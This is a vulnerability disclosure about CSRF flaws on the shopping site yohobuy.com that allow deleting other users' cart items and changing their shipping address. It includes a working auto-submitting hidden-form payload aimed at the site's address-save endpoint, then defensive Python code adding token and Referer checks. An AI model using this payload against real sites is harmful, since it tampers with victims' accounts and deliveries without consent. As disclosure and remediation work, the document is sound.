YOHO! (yohobuy.com) CSRF: batch-delete the contents of other users' shopping carts and modify their shipping address.
YOHO! It's nice to have goods in stock, but it's a pity the year-end bonus won't be paid out in March.
Here I submit a CSRF that deletes items from other users' shopping carts in batches. The root cause is that the cart-deletion request carries no token and the Referer header is not checked at all.
1. On a Kali host, log in with account A. First capture the shopping-cart deletion request and check whether it carries a token and whether the Referer is restricted.
OK. There is no token check, and the timestamp 1407715543670 can be changed freely. The id shows that the shopping-cart item ids for one day fall in the range 3555xxxx (yesterday's cart ids were 3550xxxx), which is obviously tied to the total number of cart items added across the whole site each day, so the daily purchase volume can roughly be estimated from it.
2. Next, create a file csrfyohu.html with the following content and place it on the host 172.16.1.20.
3. On a Windows 7 host that is logged in to YOHO! as account B, visit http://172.16.1.20/csrfYohu.html; the page starts automatically traversing the shopping-cart contents of account B.
Shopping cart before deletion
After running for half a minute, I found that one shopping-cart item was missing! @@!
CSRF attack successful
//////////////////////////////
Next, let's look at the CSRF for modifying the shipping address.
The idea is the same as above: first modify the address while capturing packets to see whether there is a token.
Okay. Place an HTML file on http://172.16.1.20 to trick the victim into opening it. Its content is as follows: hide the page, submit the POST, and set the id in the last POST parameter at random; in the test the id made no difference.
<form method='post' action='http://www.yohobuy.com/home/address/save'>
<input type='text' value='month' name='sssee_name' style='display:none!important;display:block;width=0;height=0'/>
<input type='text' value='shanghai Center' name='address' style='display:none!important;display:block;width=0;height=0'/>
<input type='text' value='000000' name='zip_Code' style='display:none!important;display:block;width=0;height=0'/>
<input type='text' value='000000' name='phone' style='display:none!important;display:block;width=0;height=0'/>
<input type='text' value='000000' name='mobile' style='display:none!important;display:block;width=0;height=0'/>
<input type='text' value='[email protected]' name='direct' style='display:none!important;display:block;width=0;height=0'/>
<input type='text' value='000000' name='area_Code' style='display:none!important;display:block;width=0;height=0'/>
<input type='text' value='000000' name='id' style='display:none!important;display:block;width=0;height=0'/>
</form>
<script>document.forms[0].submit();</script>
Using Python to verify that the parameter values are correctly URL-encoded.
CSRF address modification successful
Solution:
Add a Referer check or introduce a CSRF token; a CAPTCHA is not necessary! @@!
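As an added illustration of the fix proposed above (this is example code, not the site's own implementation), the following server-side check combines both suggestions: an Origin/Referer check against the site's origin and a per-session HMAC token. The site origin is taken from the PoC form's action; the secret, session ids and function names are assumptions for the example.

```python
# Added example (not the vendor's code): CSRF defence for a state-changing POST
# such as /home/address/save, using an Origin/Referer check plus a session-bound token.
import hmac
import hashlib
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "http://www.yohobuy.com"  # origin of the real site (from the PoC form's action)


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Token = random nonce + HMAC(secret, session_id:nonce).

    Binding the MAC to the session id means a token captured from the attacker's own
    session (account A) does not verify for the victim's session (account B).
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_is_valid(token: str, session_id: str, secret: bytes) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)  # constant-time comparison


def source_is_trusted(headers: dict) -> bool:
    """Prefer Origin, fall back to Referer, and refuse a POST that carries neither:
    the PoC page on 172.16.1.20 reaches here with a foreign Referer, not the site's."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlparse(src)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN  # exact match, no prefix/suffix tricks


def check_state_changing_post(headers: dict, form: dict, session_id: str, secret: bytes) -> str:
    """Return 'ok', or the reason the POST must be rejected."""
    if not source_is_trusted(headers):
        return "bad-origin"
    if not token_is_valid(form.get("csrf_token", ""), session_id, secret):
        return "bad-token"
    return "ok"
```

The token alone already defeats the cross-site form above; the Origin/Referer check is defence in depth, and a deployment that cannot rely on Referer being present should make the token the mandatory half.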